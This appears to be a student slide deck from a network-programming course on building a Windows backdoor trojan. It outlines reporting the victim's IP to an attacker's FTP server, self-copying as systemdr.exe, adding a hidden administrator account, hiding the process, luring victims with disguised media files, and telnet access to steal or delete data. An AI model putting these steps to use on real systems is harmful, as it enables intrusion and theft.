後門程式實作 組員: 596435015陳柚蓁 596435009蔡瑞得 596435007楊明鑫 網路程式設計
Introduction Purpose Open backdoor (Telnet、終端機) get最高權限的帳戶 get被駭電腦IP 進行各種駭客任務 網路程式設計
Introduction 執行環境 輔助tools Microsoft Windows XP BackDoor.sf6 Setup Factory 6.0 FTP server 網頁空間 Camtasia Studio 4 網路程式設計
木馬製作 SetupFactory是一套為寫好的軟體設計安裝的工具,也可被駭客拿來設計木馬與相關工具 將寫好的木馬存成.sf6檔 網路程式設計
木馬製作 網路程式設計
木馬包製流程 網路程式設計
木馬製作 網路程式設計
木馬製作 網路程式設計
木馬製作 網路程式設計
木馬製作 網路程式設計
木馬製作 網路程式設計
木馬製作 網路程式設計
木馬製作 網路程式設計
木馬製作 網路程式設計
木馬製作 網路程式設計
木馬製作 網路程式設計
木馬製作 使用動態IP將自己的電腦當作FTP簡易伺服器 (下載FTP server) 將FTP簡易伺服器的IP位址存成ipx.txt上傳到某網頁空間 ipx.txt內key: xxx.xxx.xxx.xxx PUT c:\ip.txt victimip.txt ↑ (FTP server的IP位址) 網路程式設計
木馬製作 網路程式設計
木馬製作 網路程式設計
木馬製作 網路程式設計
木馬製作 網路程式設計
木馬製作後 這個木馬完成後,駭客可以用各種藉口或理由 利用各種管道 送給被駭者 (影片、動畫、遊戲、音樂) (E-Mail、即時通、聊天室) 網路程式設計
被駭電腦 C:\WINDOWS\system32 使用者帳戶 產生bkdoor0.tmp 複製木馬資訊為systemdr.exe 產生一個駭客建立擁有最高權限的帳戶 網路程式設計
駭客操控 登入被駭者電腦 行為 DOS指令: telnet –t ansi 被駭者電腦IP 輸入使用者帳號密碼 偷看 竊取 修改 刪除 網路程式設計
DOS command DIR/W 顯示檔案名稱 FORMAT 格式化 ,例: FORMAT C: COPY 複製檔案 ,例:COPY A: lmi.txt C: DEL 刪除檔案 REN 將檔案重新命名 MD 建立一個新的資料夾 TYPE 列印文字檔用 CLS 清除螢幕 網路程式設計
functions DWORD dwVersion = GetVersion(); 得到操作系統的版本號 typedef DWORD (CALLBACK* LPREGISTERSERVICEPROCESS)(DWORD,DWORD); 定義RegisterServiceProcess()函數的原型 hDLL = LoadLibrary("KERNEL32"); 加載RegisterServiceProcess()函數所在的動態鏈接庫KERNEL32.DLL 網路程式設計
functions RegisterServiceProcess(); 隱藏本進程 GetSystemDirectory(TempPath ,MAX_PATH); TempPath是system目錄緩衝區的地址,MAX_PATH是緩衝區的大小,得到目標機的System目錄路徑 AnsiString(SystemPath+"\\Systemdr.exe").c_str() ,FALSE); 將自己拷貝到%System%目錄下,並改名為Systemdr.exe 網路程式設計
參考文獻 駭客攻防技術擂台 網路安全設定與網路入侵防護 何謂後門程式(Backdoor) 病毒與惡性程式碼 Computer: Event: 200501 有趣的木馬解剖 網路程式設計
分工配置 明鑫…協尋相關知識 柚蓁…程式與實作 瑞得…提供資料與書面報告 網路程式設計